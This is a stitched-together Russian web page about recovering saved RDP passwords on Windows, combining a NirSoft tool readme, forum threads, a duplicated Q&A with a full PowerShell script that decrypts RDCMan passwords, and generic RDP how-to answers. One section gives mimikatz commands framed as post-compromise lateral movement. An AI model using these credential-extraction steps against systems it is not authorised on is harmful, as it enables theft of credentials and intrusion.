Как посмотреть сохраненный пароль rdp windows 10

 
Remote Desktop PassView v1.02 — Recover the password of Remote Desktop Connection utility

Copyright (c) 2006 — 2014 Nir Sofer

Description

Remote Desktop PassView is a small utility that reveals the password stored by
Microsoft Remote Desktop Connection utility inside the .rdp files.


Notice: Currently, this tool doesn’t work with the latest versions of Remote Desktop Connection utility.
You can use the following tools to get the passwords stored by new versions of Remote Desktop Connection (6.0 or higher):


Network Password Recovery

CredentialsFileView

Versions History

  • Version 1.02 — Removed the command-line options that export the passwords to a file from the official version. A version of this tool with full command-line support will be posted on separated Web page.
  • Version 1.01 — The configuration is now saved to a file instead of the Registry.
  • Version 1.00 — First release.

License

This utility is released as freeware.
You are allowed to freely distribute this utility via floppy disk, CD-ROM,
Internet, or in any other way, as long as you don’t charge anything for this.
If you distribute this utility, you must include all files in
the distribution package, without any modification !

Be aware that selling this utility as a part of a software package is not allowed !

Disclaimer

The software is provided «AS IS» without any warranty, either expressed or implied,
including, but not limited to, the implied warranties of merchantability and fitness
for a particular purpose. The author will not be liable for any special, incidental,
consequential or indirect damages due to loss of data or any other reason.

Using Remote Desktop PassView

Remote Desktop PassView doesn’t require any installation process or additional DLL files.
Just copy the executable (rdpv.exe) to any folder you like, and run it.
After you run rdpv.exe, the main window display the passwords of .rdp located under your
«My Documents» folder. The default .rdp file (Default.rdp) is usually stored in this location

If you want to recover that password of another .rdp file, just drag the file from Explorer into
the window of Remote Desktop PassView utility or use the «Open .rdp File» option from the File menu.

Be aware that Remote Desktop PassView can only recover the passwords created by your current
logged on user. It cannot recover the passwords of .rdp files created by other users.

Translating Remote Desktop PassView To Another Language

Remote Desktop PassView allows you to easily translate all menus, dialog-boxes, and other strings
to other languages.

In order to do that, follow the instructions below:

  1. Run Remote Desktop PassView with /savelangfile parameter:

    rdpv.exe /savelangfile

    A file named rdpv_lng.ini will be created in the folder of Remote Desktop PassView utility.
  2. Open the created language file in Notepad or in any other text editor.
  3. Translate all menus, dialog-boxes, and string entries to the desired language.
  4. After you finish the translation, Run Remote Desktop PassView, and all translated
    strings will be loaded from the language file.

    If you want to run Remote Desktop PassView without the translation, simply rename the language file, or move
    it to another folder.

Feedback

If you have any problem, suggestion, comment, or you found a bug in my utility,
you can send a message to nirsofer@yahoo.com

Remote Desktop PassView is also available in other languages. In order to change the language of
Remote Desktop PassView, download the appropriate language zip file, extract the ‘rdpv_lng.ini’,
and put it in the same folder that you Installed Remote Desktop PassView utility.

Language Translated By Date Version

Arabic Abo Rehaam 11/02/2011 1.01

Bulgarian Hristo Drumev 13/01/2007  

Dutch Jan Verheijen 23/02/2015 1.02

French PasswordOne 21/02/2015  

Galician Xosé Antón Vicente rodríguez 13/01/2007  

German «Latino» auf WinTotal.de 18/09/2014 1.02

Hebrew peterg 29/04/2011  

Hungarian ZityiSoft 20/06/2009  

Italian Fabio Mastroianni 13/01/2007  

Italian Maurizio Madaro 12/01/2007  

Persian ( JAVAD JOURSARAEI Alashti ) 06/08/2014  

Persian Amirreza Nasiri 13/11/2015 1.02

Romanian Jaff (Oprea Nicolae) 05/02/2016 1.02

Russian Sonya 10/03/2010  

Simplified Chinese Rindz 30/11/2013 1.04

Slovak František Fico 09/02/2017 1.02

Spanish Spyn — Toño 21/04/2009  

Spanish arquer.net 20/05/2009  

Taiwanese Republic of Taiwan 06/01/2007  

Traditional Chinese 繁體中文 23/03/2007  

Turkish Kitap Özetleri 30/01/2009  

Turkish EFromm 11/02/2009  

  

0x01 введение

После получения полномочий администратора компьютера интрасети проверьте, существует ли локально сохраненный пароль для подключения RDP, и расшифруйте сохраненный пароль для подключения RDP локально.После успешного дешифрования вы можете использовать эти учетные данные для продолжения горизонтального перемещения.

0x02 Получить пароль RDP, сохраненный локально на управляемой машине

Один, мимикатц

1. Проверьте целевой компьютер, к которому локальный компьютер подключен локально.

reg query "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers" /s

2. Проверьте, есть ли в этом каталоге файл паролей RDP для локального пользователя.

dir /a %userprofile%AppDataLocalMicrosoftCredentials*

Просмотр информации об удаленном хосте, сохраненной локально

cmdkey /list

3. Выберите файл паролей, чтобы расшифровать его. Здесь вам нужно записать значение guidMasterKey, и вы найдете соответствующий мастер-ключ позже через guidMasterKey.

mimikatz # privilege::debug
mimikatz # dpapi::cred /in:C:UsersAdministratorAppDataLocalMicrosoftCredentials8781378F7D47006A4FC98D2F8A266F58

4. Найдите соответствующий мастер-ключ в соответствии с guidMasterKey.

mimikatz # sekurlsa::dpapi

5. Расшифруйте простой текстовый пароль RDP-подключения с помощью Masterkey.

mimikatz # dpapi::cred /in:C:UsersAdministratorAppDataLocalMicrosoftCredentials8781378F7D47006A4FC98D2F8A266F58 /masterkey:1df6b7a86b7aa3238c6899b1b4fd7b4ccba852db9b2ea611bbb7943f34b788f55d27835591ccde1e6c643d9aca724fd495282f5fc92ee80746262d8759b9d23d

Два, netpass

скачать:
netpass


использовать:
Дважды щелкните netpass.exe.

Три, другие

Скрипт Powershell для автоматизации дешифрования …

  • Remove From My Forums
  • Вопрос

  • Ситуация:
    имеется общедоступное хранилище rdp файлов с опубликованными различными прилождениями на windows server 2008r2 enterprise (russian), клиентам через gp распространяются линки на эти файлы, некоторые пользователи при первом подключении сохраняют логин/пароль но вводят их неверное.
    Внимание ворос — что где нужно удалить чтобы сбросить сохраненные данные? Вариант через запуск mstsc.exe с очисткой данных не подходит.
    Искал ветки в реестре HKCU и файлы в профиле, но ни к чему работающему не пришел.

    P.S.  Интересно именно удаленная очистка сохранение — те ветка реестра и/или файлы задействованные в сохранении rpd пароля/логина, дабы не подключаться к gui каждого.

    • Изменено

      28 сентября 2009 г. 14:46
      Добавлен p.s.

Ответы

  • Пуск -> Настройка -> Панель управления -> Учётные записи пользователей -> Закладка «Дополнительно» -> Кнопка «Управление паролями»


    MCSE, MCTS, MCITP, STS, VTSP

    Добавлю свои 5 копеек: можно автоматизировать удаление сохраненных Сетевых паролей (Stored User Names andPasswords) при помощи простого логон скрипта и утилиты коммандной строки cmdkey

    • Предложено в качестве ответа
      Buchenkov Andrey
      29 сентября 2009 г. 5:55
    • Помечено в качестве ответа
      gamumba
      29 сентября 2009 г. 6:55

   oslokot

07.10.12 — 13:21

Привет всем!

Где хранит пароли RDP-клиент? (win7)

Реально ли выдернуть учетку?

   Йохохо

1 — 07.10.12 — 13:51

Панель управления — учетные записи пользователей — диспетчер учетных данных

   oslokot

2 — 07.10.12 — 16:35

(1) да при чем тут учетки юзеров?

Где физически хранятся пароли (хеши) от RDP-клиента?

   Fragster

3 — 07.10.12 — 16:36

учись пользоваться яндексом и гуглом

   IamAlexy

4 — 07.10.12 — 16:36

(2) в моих документах файлики  лежат рдпшные

скрытые вроде как

   zak555

5 — 07.10.12 — 16:38

IP давай

   oslokot

6 — 07.10.12 — 16:41

(3) не помогло

(4) эх…

Итак, на рабочем столе есть ярлык RDP. В нем сохранена учетная запись для подключения (user&pass)

Мне пароль нада посмотреть

   sdv2000

7 — 07.10.12 — 23:32

ярлык указывает на %windir%system32mstsc.exe

пароля там нет :)

   PR

8 — 07.10.12 — 23:33

   sdv2000

9 — 07.10.12 — 23:33

всё в реестре, в жутко зашифрованном виде

   zladenuw

10 — 07.10.12 — 23:33

   sdv2000

11 — 07.10.12 — 23:34

(8) оригинально

   PR

12 — 07.10.12 — 23:38

(9) Не уверен, что даже сама винда сможет расшифровать пароль. Скорее всего, хранятся только кеши.

   sdv2000

13 — 07.10.12 — 23:42

винда точно не сможет

   zladenuw

14 — 07.10.12 — 23:45

(10) а по ссылке сходить. все там можно

Чтобы использовать cmdkey , чтобы добавить имя пользователя и пароль для пользователя Mikedan доступ к компьютеру Server01 с паролем Kleo, типа:

cmdkey / дополнения: сервер / пользователь: mikedan / пароль: Kleo

Чтобы использовать cmdkey , чтобы добавить имя пользователя и пароль для пользователя Mikedan доступ к компьютеру Server01 и приглашение для ввода пароля всякий раз, когда Server01 доступ, типа:

cmdkey / дополнения: сервер / пользователь: mikedan

   sdv2000

15 — 07.10.12 — 23:47

и?

   zladenuw

16 — 07.10.12 — 23:53

что и .

читать надо

Списка: TargetName

Отображает список имен пользователей и учетных данных. Если TargetName не указано, все сохраненные имена пользователей и учетные данные будут перечислены.

   sdv2000

17 — 07.10.12 — 23:57

речь вообще-то о паролях

   sdv2000

18 — 07.10.12 — 23:58

так что «и?» :)

   zladenuw

19 — 08.10.12 — 00:00

   zladenuw

20 — 08.10.12 — 00:01

ну так там внимательно по ссылке.

описано что

Creates, lists and deletes stored user names and passwords or credentials.

passwords это слово видим ?

   etc

21 — 08.10.12 — 00:04

(0) Вообще на сколько я читал пароли кодируются с привязкой то ли к учетной записи, то ли к машине. Тоесть вроде как расшифровать можно но только на том же компьютере/пользователе.

Погугли на тему RDP + CryptProtectData и CryptUnrotectData

   zladenuw

22 — 08.10.12 — 00:08

   Фокусник

23 — 08.10.12 — 00:26

(0) забыл пароль, смени на новый.

ИМХО, такой вопрос (попытка на него ответить) не только правила форума нарушает, но и попадает под действие УК РФ ;)

  

oslokot

24 — 08.10.12 — 09:30

(23) да, вы правы. Пароль забыл, пароль сменю.

Тему можно закрывать ;)

Is there a way to decrypt a password stored in an .rdg (Remote Desktop Connection Manager) file, providing you know the username and password of the user who created it?

I know that the password is encrypted based on the user who created it. The user is a domain user, and I am trying to use the .rdg file at home (domain unavailable). Can I «simulate» being the domain user, since I know the username+password? Remember, network access to the domain is unavailable. Physical access to the original machine is also unavailable.

I have tried this method, but (unsurprisingly) I get

«Exception calling DecryptString with 2 argument(s): Failed to decrypt using XXXX credential»

(XXX is my current home login.)

jpaugh's user avatar

jpaugh

1,3789 silver badges20 bronze badges

asked Jul 20, 2016 at 14:33

pkExec's user avatar

Here’s a Powershell script that will do the job…

Open the RDG file with notepad to get the encrypted password. I found
that RDG contained the ‘profiles’ I had saved, as well as the
passwords saved per server.

Now use the same computer and windows account that created the RDG
file to run the following powershell commands to see the password. You
have to use the same account to decrypt.

> $PwdString = 'EnCryptEdStringFRoMRDGfile=='
> Copy-Item 'C:Program Files (x86)MicrosoftRemote Desktop Connection ManagerRDCMan.exe' 'C:tempRDCMan.dll'
> Import-Module 'C:tempRDCMan.dll'
> $EncryptionSettings = New-Object -TypeName RdcMan.EncryptionSettings
> [RdcMan.Encryption]::DecryptString($PwdString, $EncryptionSettings)

Source:
https://blog.prudhomme.wtf/use-powershell-to-decrypt-password-stored-in-a-rdg-file/ by THOMAS PRUD’HOMME

Community's user avatar

answered Jan 4, 2017 at 14:59

Ken's user avatar

KenKen

2112 silver badges3 bronze badges

3

Use the following Powershell script to decrypt all passwords in an RDG file in a single shot.
https://github.com/nettitude/PoshC2/blob/master/resources/modules/Decrypt-RDCMan.ps1

In case the link fails here’s the content for reference:

function Decrypt-RDCMan ($FilePath) {
<#
.SYNOPSIS

This script should be able to decrpt all passwords stored in the RDCMan config file

Function: Decrypt-RDCMan
Author:Ben Turner @benpturner, Rich Hicks @scriptmonkey_

.EXAMPLE

Decrypt-RDCMan -FilePath
#>
    if (!$FilePath) {
        [xml]$config = Get-Content "$env:LOCALAPPDATAmicrosoftremote desktop connection managerrdcman.settings"
        $Xml = Select-Xml -Xml $config -XPath "//FilesToOpen/*"
        $Xml | select-object -ExpandProperty "Node"| % {Write-Output "Decrypting file: " $_.InnerText; Decrypt-RDCMan $_.InnerText}
    } else {
    [xml]$Types = Get-Content $FilePath

    $Xml = Select-Xml -Xml $Types -XPath "//logonCredentials"

    # depending on the RDCMan version we may need to change the XML search 
    $Xml | select-object -ExpandProperty "Node" | % { $pass = Decrypt-DPAPI $_.Password; $_.Domain + "" + $_.Username + " - " + $Pass + " - " + "Hash:" + $_.Password + "`n" } 

    # depending on the RDCMan version, we may have to use search through the #text field in the XML structure 
    $Xml | select-object -ExpandProperty "Node" | % { $pass = Decrypt-DPAPI $_.Password."#text"; $_.Domain + "" + $_.Username + "`n" + $Pass + " - Hash: " + $_.Password."#text" + "`n"}
    }
}

function Decrypt-DPAPI ($EncryptedString) {
    # load the Security Assembly into the PS runspace
    Add-Type -assembly System.Security
    $encoding= [System.Text.Encoding]::ASCII
    $uencoding = [System.Text.Encoding]::UNICODE

    # try and decrypt the password with the CurrentUser Scope
    try {
        $encryptedBytes = [System.Convert]::FromBase64String($encryptedstring)
        $bytes1 = [System.Security.Cryptography.ProtectedData]::Unprotect($encryptedBytes, $null, [System.Security.Cryptography.DataProtectionScope]::CurrentUser)
        [System.Text.Encoding]::Convert([System.Text.Encoding]::UNICODE, $encoding, $bytes1) | % { $myStr1 += [char]$_}
        echo $myStr1
    } 
    catch {
        # try and decrypt the password with the LocalMachine Scope only if the CurrentUser fails
        try {
            $encryptedBytes = [System.Convert]::FromBase64String($encryptedstring)
            $bytes1 = [System.Security.Cryptography.ProtectedData]::Unprotect($encryptedBytes, $null, [System.Security.Cryptography.DataProtectionScope]::LocalMachine)
            [System.Text.Encoding]::Convert([System.Text.Encoding]::UNICODE, $encoding, $bytes1) | % { $myStr1 += [char]$_}
            echo $myStr1
        }
        catch {
            echo "Could not decrypt password"
        }
    }
}

Execute the script in Powershell ISE, that should register the functions. Then simple run:

Decrypt-RDCMan -FilePath MyRDGfile.rdg

answered Oct 20, 2018 at 8:03

Sahil Shah's user avatar

1

Is there a way to decrypt a password stored in an .rdg (Remote Desktop Connection Manager) file, providing you know the username and password of the user who created it?

I know that the password is encrypted based on the user who created it. The user is a domain user, and I am trying to use the .rdg file at home (domain unavailable). Can I «simulate» being the domain user, since I know the username+password? Remember, network access to the domain is unavailable. Physical access to the original machine is also unavailable.

I have tried this method, but (unsurprisingly) I get

«Exception calling DecryptString with 2 argument(s): Failed to decrypt using XXXX credential»

(XXX is my current home login.)

jpaugh's user avatar

jpaugh

1,3789 silver badges20 bronze badges

asked Jul 20, 2016 at 14:33

pkExec's user avatar

Here’s a Powershell script that will do the job…

Open the RDG file with notepad to get the encrypted password. I found
that RDG contained the ‘profiles’ I had saved, as well as the
passwords saved per server.

Now use the same computer and windows account that created the RDG
file to run the following powershell commands to see the password. You
have to use the same account to decrypt.

> $PwdString = 'EnCryptEdStringFRoMRDGfile=='
> Copy-Item 'C:Program Files (x86)MicrosoftRemote Desktop Connection ManagerRDCMan.exe' 'C:tempRDCMan.dll'
> Import-Module 'C:tempRDCMan.dll'
> $EncryptionSettings = New-Object -TypeName RdcMan.EncryptionSettings
> [RdcMan.Encryption]::DecryptString($PwdString, $EncryptionSettings)

Source:
https://blog.prudhomme.wtf/use-powershell-to-decrypt-password-stored-in-a-rdg-file/ by THOMAS PRUD’HOMME

Community's user avatar

answered Jan 4, 2017 at 14:59

Ken's user avatar

KenKen

2112 silver badges3 bronze badges

3

Use the following Powershell script to decrypt all passwords in an RDG file in a single shot.
https://github.com/nettitude/PoshC2/blob/master/resources/modules/Decrypt-RDCMan.ps1

In case the link fails here’s the content for reference:

function Decrypt-RDCMan ($FilePath) {
<#
.SYNOPSIS

This script should be able to decrpt all passwords stored in the RDCMan config file

Function: Decrypt-RDCMan
Author:Ben Turner @benpturner, Rich Hicks @scriptmonkey_

.EXAMPLE

Decrypt-RDCMan -FilePath
#>
    if (!$FilePath) {
        [xml]$config = Get-Content "$env:LOCALAPPDATAmicrosoftremote desktop connection managerrdcman.settings"
        $Xml = Select-Xml -Xml $config -XPath "//FilesToOpen/*"
        $Xml | select-object -ExpandProperty "Node"| % {Write-Output "Decrypting file: " $_.InnerText; Decrypt-RDCMan $_.InnerText}
    } else {
    [xml]$Types = Get-Content $FilePath

    $Xml = Select-Xml -Xml $Types -XPath "//logonCredentials"

    # depending on the RDCMan version we may need to change the XML search 
    $Xml | select-object -ExpandProperty "Node" | % { $pass = Decrypt-DPAPI $_.Password; $_.Domain + "" + $_.Username + " - " + $Pass + " - " + "Hash:" + $_.Password + "`n" } 

    # depending on the RDCMan version, we may have to use search through the #text field in the XML structure 
    $Xml | select-object -ExpandProperty "Node" | % { $pass = Decrypt-DPAPI $_.Password."#text"; $_.Domain + "" + $_.Username + "`n" + $Pass + " - Hash: " + $_.Password."#text" + "`n"}
    }
}

function Decrypt-DPAPI ($EncryptedString) {
    # load the Security Assembly into the PS runspace
    Add-Type -assembly System.Security
    $encoding= [System.Text.Encoding]::ASCII
    $uencoding = [System.Text.Encoding]::UNICODE

    # try and decrypt the password with the CurrentUser Scope
    try {
        $encryptedBytes = [System.Convert]::FromBase64String($encryptedstring)
        $bytes1 = [System.Security.Cryptography.ProtectedData]::Unprotect($encryptedBytes, $null, [System.Security.Cryptography.DataProtectionScope]::CurrentUser)
        [System.Text.Encoding]::Convert([System.Text.Encoding]::UNICODE, $encoding, $bytes1) | % { $myStr1 += [char]$_}
        echo $myStr1
    } 
    catch {
        # try and decrypt the password with the LocalMachine Scope only if the CurrentUser fails
        try {
            $encryptedBytes = [System.Convert]::FromBase64String($encryptedstring)
            $bytes1 = [System.Security.Cryptography.ProtectedData]::Unprotect($encryptedBytes, $null, [System.Security.Cryptography.DataProtectionScope]::LocalMachine)
            [System.Text.Encoding]::Convert([System.Text.Encoding]::UNICODE, $encoding, $bytes1) | % { $myStr1 += [char]$_}
            echo $myStr1
        }
        catch {
            echo "Could not decrypt password"
        }
    }
}

Execute the script in Powershell ISE, that should register the functions. Then simple run:

Decrypt-RDCMan -FilePath MyRDGfile.rdg

answered Oct 20, 2018 at 8:03

Sahil Shah's user avatar

1

Нажмите клавишу Windows и введите: расширенная система. Щелкните Просмотр дополнительных настроек системы. Щелкните вкладку «Удаленный» и выберите «Разрешить удаленные подключения к этому компьютеру». Установите флажок «Проверка подлинности на уровне сети» для большей безопасности.

В служебной программе «Управление компьютером» перейдите в «Локальные пользователи и группы»> «Пользователи», затем щелкните правой кнопкой мыши нужного пользователя удаленного рабочего стола (пользователь по умолчанию — ServerAdmin) и выберите Установить пароль…. Во всплывающем окне выберите «Продолжить» и завершите смену пароля.

Как мне найти свои учетные данные для удаленного рабочего стола?

Щелкните значок настроек / шестеренки в правом верхнем углу окна Jump Desktop Connect. Затем нажмите Диагностика. Ваше имя пользователя будет отображаться рядом с полем «Имя пользователя». Используйте это как имя пользователя в запросе учетных данных Windows.

Как мне найти имя пользователя и пароль для удаленного рабочего стола?

Удаленный рабочий стол с компьютера Linux

Откройте свою терминальную программу. (Не забудьте использовать IP-адрес вашего сервера.) Появится запрос на вход в Windows. Войдите в систему, используя «Администратор» в качестве имени пользователя и основного пароля администратора..

Что такое учетный пароль в удаленном рабочем столе?

Обычно используется для хранения учетных данных Windows для ваших текущих сеансов потому что диспетчер удаленного рабочего стола не может получить к ним доступ. … Когда требуется сменить пароль, вам просто нужно изменить его один раз в «Мои личные учетные данные».

Как мне войти в удаленный рабочий стол без пароля?

Windows — разрешить доступ к удаленному рабочему столу с пустыми паролями

  1. Запустите gpedit.msc.
  2. Перейдите в Конфигурация компьютера> Параметры Windows> Параметры безопасности> Локальные политики> Параметры безопасности.
  3. Установить учетные записи: ограничение использования пустых паролей локальными учетными записями только для входа в консоль = отключено.

Как подключиться к удаленному рабочему столу в Windows 10?

На локальном ПК с Windows 10: в поле поиска на панели задач тип Подключение к удаленному рабочему столу, а затем выберите Подключение к удаленному рабочему столу. В «Подключение к удаленному рабочему столу» введите имя ПК, к которому вы хотите подключиться (из шага 1), а затем выберите «Подключиться».

Как настроить учетные данные удаленного рабочего стола?

Перейдите в «Пуск -> Все программы -> Стандартные -> Подключение к удаленному рабочему столу».». 2. Откроется окно, подобное приведенному ниже, где вы должны ввести адрес своего удаленного компьютера. Нажмите «Подключиться», чтобы ввести свои учетные данные.

Как использовать учетные данные удаленного рабочего стола?

Процедура

  1. Запустите клиент подключения к удаленному рабочему столу Microsoft, щелкнув Пуск> Все программы> Стандартные> Подключение к удаленному рабочему столу.
  2. Укажите имя целевого хоста или IP-адрес.
  3. Нажмите Connect.
  4. Когда будет предложено войти в систему с учетными данными общего доступа, выберите Да.

Как изменить учетные данные удаленного рабочего стола?

Как изменить пароль через удаленный рабочий стол

  1. Шаг 1: В меню «Пуск» окна найдите «подключение к удаленному рабочему столу» и откройте его.
  2. Шаг 2: Введите имя компьютера как «passreset1.uwb.edu» и нажмите «Подключиться».
  3. Шаг 3: Вам будет предложено ввести учетные данные, выберите «Использовать другую учетную запись».

Как мне войти в систему как администратор на удаленном рабочем столе?

Удаленный рабочий стол: добавление пользователя в группу администраторов (Windows 7)

  1. Откройте меню «Пуск» на рабочем столе и выберите «Панель управления».
  2. Выберите Учетные записи пользователей и выберите Учетные записи пользователей.
  3. Выберите Управление учетными записями пользователей.
  4. В окне «Учетные записи пользователей» выберите учетную запись, которую нужно изменить, и выберите «Свойства».

Как мне войти на удаленный рабочий стол как администратор?

Сетевое администрирование: подключение к удаленному рабочему столу

  1. Откройте Панель управления и дважды щелкните Система. На этом шаге появляется системный апплет.
  2. Щелкните вкладку Remote. Этот шаг вызывает параметры удаленного доступа.
  3. Установите один из двух флажков Разрешить подключения. Какой выбрать? …
  4. Щелкните ОК. Готово!

Понравилась статья? Поделить с друзьями:
  • Как посмотреть содержимое буфера обмена windows 10
  • Как посмотреть сохраненные пароли от wifi на компьютере windows 10
  • Как посмотреть содержание буфера обмена windows 10
  • Как посмотреть сколько ядров на компьютере windows 7
  • Как посмотреть сохраненные пароли в microsoft edge в windows 10